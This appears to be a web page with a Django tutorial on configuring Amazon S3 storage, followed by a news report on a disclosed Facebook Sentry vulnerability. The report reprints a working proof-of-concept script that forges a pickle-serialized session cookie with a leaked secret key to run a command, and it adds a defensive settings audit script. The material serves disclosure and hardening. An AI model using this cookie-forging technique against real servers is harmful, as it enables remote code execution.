How to set up Amazon S3 in a Django Project?

Detailed tutorial with screenshots and code examples 
07 August 2017   1902

What is Amazon S3? 

Amazon Simple Storage Service (Amazon S3) is an online web service offered by Amazon that provides file hosting: the ability to store and retrieve any amount of data, at any time, from anywhere on the network. Amazon S3 delivers high scalability, reliability, high speed and inexpensive storage infrastructure. It first appeared in March 2006 in the US and in November 2007 in Europe.

Amazon S3 is used by many other services to store and host files; for example, Dropbox and Ubuntu One, Twitter and Woot.com, and even Minecraft use it.

How to use Amazon S3 in Django Project? 

The Amazon S3 service can be used to handle static assets and user-uploaded files, that is, the media assets.

In the tutorial, you will find three sections:

  • Working with static assets only
  • Working with static and media assets
  • Mixing public assets and private assets

Additionally, you will learn how to set up Amazon S3.

You will also need to install two Python libraries:

  • boto3
  • django-storages

The boto3 library is a public API client for accessing Amazon Web Services (AWS) resources such as Amazon S3. It is an official distribution maintained by Amazon.


django-storages is an open-source library for managing storage backends such as Dropbox, OneDrive and Amazon S3. It is very convenient, as it plugs into the built-in Django storage backend API. In other words, it makes your life easier, as it does not drastically change how you interact with static and media assets.
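The three arrangements listed above (static only, static plus media, public mixed with private) come down to how each storage backend is configured. The settings fragment below is an added example, not code from the tutorial or from the django-storages project. It assumes Django 4.2 or later and django-storages 1.14 or later (the STORAGES dict with an OPTIONS block), and the bucket name, region and the local helper names S3_BUCKET and S3_REGION are placeholders.

```python
# settings.py fragment (added example). Assumes Django 4.2+ and django-storages 1.14+;
# bucket and region values are placeholders.

# No AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY here on purpose: boto3 takes
# credentials from the environment, ~/.aws/credentials or the IAM role of the
# host, so settings.py (and a DEBUG error page) never contains a secret.
S3_BUCKET = "example-django-assets"   # placeholder bucket name (local helper variable)
S3_REGION = "eu-west-1"               # placeholder region (local helper variable)

STORAGES = {
    # Media assets: user uploads. Private objects, reachable only through
    # URLs that django-storages signs and that expire after ten minutes.
    "default": {
        "BACKEND": "storages.backends.s3.S3Storage",
        "OPTIONS": {
            "bucket_name": S3_BUCKET,
            "region_name": S3_REGION,
            "location": "media",        # key prefix inside the bucket
            "default_acl": None,        # private; "public-read" here would expose every upload
            "querystring_auth": True,   # serve through presigned URLs
            "querystring_expire": 600,  # seconds a presigned URL stays valid
            "file_overwrite": False,    # a new upload never replaces an existing key
        },
    },
    # Static assets: same bucket, separate prefix. Read access on static/* is
    # granted by the bucket policy, and URLs are unsigned so browsers and CDNs can cache them.
    "staticfiles": {
        "BACKEND": "storages.backends.s3.S3Storage",
        "OPTIONS": {
            "bucket_name": S3_BUCKET,
            "region_name": S3_REGION,
            "location": "static",
            "default_acl": None,
            "querystring_auth": False,
            "object_parameters": {"CacheControl": "max-age=86400"},
        },
    },
}

STATIC_URL = "https://%s.s3.%s.amazonaws.com/static/" % (S3_BUCKET, S3_REGION)
MEDIA_URL = "https://%s.s3.%s.amazonaws.com/media/" % (S3_BUCKET, S3_REGION)
```

On Django versions before 4.2 the same split is expressed with STATICFILES_STORAGE and DEFAULT_FILE_STORAGE pointing at two small subclasses of storages.backends.s3boto3.S3Boto3Storage that set location, default_acl and querystring_auth as class attributes; the options themselves are the same.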

Full tutorial is available at SimpleIsBetterThanComplex.

Another Facebook Vulnerability to be Found

A cybersecurity specialist from SCRT found a way to execute code remotely on a Facebook server
27 August 2018   598

Daniel Le Gall from SCRT reported a vulnerability he found in one of Facebook's servers. The problem was in the Sentry web application for log storage, written in Python using the Django framework. Facebook's engineers have already patched the security hole on the server.

Daniel found the problem while scanning IP addresses belonging to the social network. On one of them, a Sentry service was running under the host name sentryagreements.thefacebook.com. While reviewing the application, he noticed a stack trace that appeared for no apparent reason, along with problems in the user password reset function. According to him, Django's debug mode had not been disabled, so the trace exposed the entire environment of the program:

Facebook Vulnerability

Among the environment keys, the SCRT expert spotted SESSION_SERIALIZER, which pointed to django.contrib.sessions.serializers.PickleSerializer. Daniel explained that with a forged session containing arbitrary content in the binary Pickle protocol used to serialize Python objects, one can run any code on the system. To forge a session he needed the Django secret key, which appeared in plaintext in the list of Sentry settings under the name system.secret-key:

Facebook Vulnerability

The researcher wrote a proof-of-concept script that replaced the existing contents of the sentrysid cookie with an arbitrary object and made the page take 30 seconds longer to load:

#!/usr/bin/python
# Researcher's proof of concept as published (Python 2)
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os

SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
# Verify and unpickle the existing session with the leaked key
newContent = django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()

# Re-sign the modified session so the server accepts it
print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

He reported the vulnerability to the Facebook team and received $5,000 under the Bug Bounty program. The company's specialists fixed the issue within 10 days of receiving the report.
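Three conditions had to coincide here: debug mode left on, a pickle-based session serializer, and a secret key that could be read by an outsider. The script below is an added example, not code from SCRT or from the article, that audits a Django settings file for exactly those conditions. It loads the module with the standard library's runpy (so it runs only on settings you trust), mirrors the SECRET_KEY thresholds of Django's own `manage.py check --deploy` warning security.W009, and adds the serializer check that Django's deploy checks do not cover. The two sample settings blocks and the key value inside them are constructed for the example.

```python
"""Audit a Django settings file for the conditions that combined in the Sentry
incident: DEBUG left on, a pickle-based session serializer, and a weak SECRET_KEY.
Added example; not code from SCRT or the article."""
import os
import runpy
import tempfile

PICKLE_SERIALIZER = "django.contrib.sessions.serializers.PickleSerializer"
JSON_SERIALIZER = "django.contrib.sessions.serializers.JSONSerializer"  # Django's default
SIGNED_COOKIE_ENGINE = "django.contrib.sessions.backends.signed_cookies"

# Thresholds mirror Django's own deployment check (security.W009).
SECRET_KEY_MIN_LENGTH = 50
SECRET_KEY_MIN_UNIQUE = 5
INSECURE_PREFIX = "django-insecure-"  # prefix of the key that startproject generates


def weak_secret_key(key) -> bool:
    """True if the key is missing, short, low-entropy, or the startproject placeholder."""
    if not isinstance(key, str) or not key:
        return True
    return (len(key) < SECRET_KEY_MIN_LENGTH
            or len(set(key)) < SECRET_KEY_MIN_UNIQUE
            or key.startswith(INSECURE_PREFIX))


def audit_settings(settings: dict) -> list:
    """Return findings for a dict of Django settings; an empty list means clean."""
    findings = []
    if settings.get("DEBUG", False):
        findings.append("DEBUG=True: error pages expose settings and environment "
                        "to anyone who can trigger an exception")
    serializer = settings.get("SESSION_SERIALIZER", JSON_SERIALIZER)
    uses_pickle = serializer == PICKLE_SERIALIZER
    if uses_pickle:
        findings.append("SESSION_SERIALIZER=PickleSerializer: whoever holds SECRET_KEY "
                        "can forge a session that runs code when loaded; use JSONSerializer")
    if weak_secret_key(settings.get("SECRET_KEY")):
        findings.append("SECRET_KEY missing, shorter than 50 chars, low-entropy, "
                        "or the 'django-insecure-' placeholder")
    if uses_pickle and settings.get("SESSION_ENGINE") == SIGNED_COOKIE_ENGINE:
        findings.append("signed_cookies engine with pickle: the whole session lives in "
                        "the client cookie, so a forged cookie needs no server-side state")
    return findings


def audit_settings_file(path: str) -> list:
    """Audit a settings module by path. runpy executes it, so only audit files you trust."""
    return audit_settings(runpy.run_path(path))


def audit_settings_source(source: str) -> list:
    """Audit settings given as source text (written to a temporary file, then removed)."""
    with tempfile.NamedTemporaryFile("w", suffix=".py", delete=False) as fh:
        fh.write(source)
        path = fh.name
    try:
        return audit_settings_file(path)
    finally:
        os.remove(path)


# Constructed sample resembling the state the article describes.
VULNERABLE_SETTINGS = """
DEBUG = True
SECRET_KEY = "changeme"
SESSION_ENGINE = "django.contrib.sessions.backends.signed_cookies"
SESSION_SERIALIZER = "django.contrib.sessions.serializers.PickleSerializer"
"""

# Constructed sample after hardening (the key value is made up for the example).
HARDENED_SETTINGS = """
DEBUG = False
SECRET_KEY = "constructed-example-key-0123456789-abcdefghijklmno"
SESSION_ENGINE = "django.contrib.sessions.backends.db"
SESSION_SERIALIZER = "django.contrib.sessions.serializers.JSONSerializer"
"""

if __name__ == "__main__":
    for name, src in (("vulnerable", VULNERABLE_SETTINGS), ("hardened", HARDENED_SETTINGS)):
        print(name + ":", audit_settings_source(src) or ["no findings"])
```

Run it against a real settings module with audit_settings_file("path/to/settings.py"); the vulnerable sample yields four findings and the hardened sample none. Note that even with JSONSerializer the secret key still signs every session cookie, so keeping DEBUG off and the key out of anything an error page or log can show remains the first line of defence.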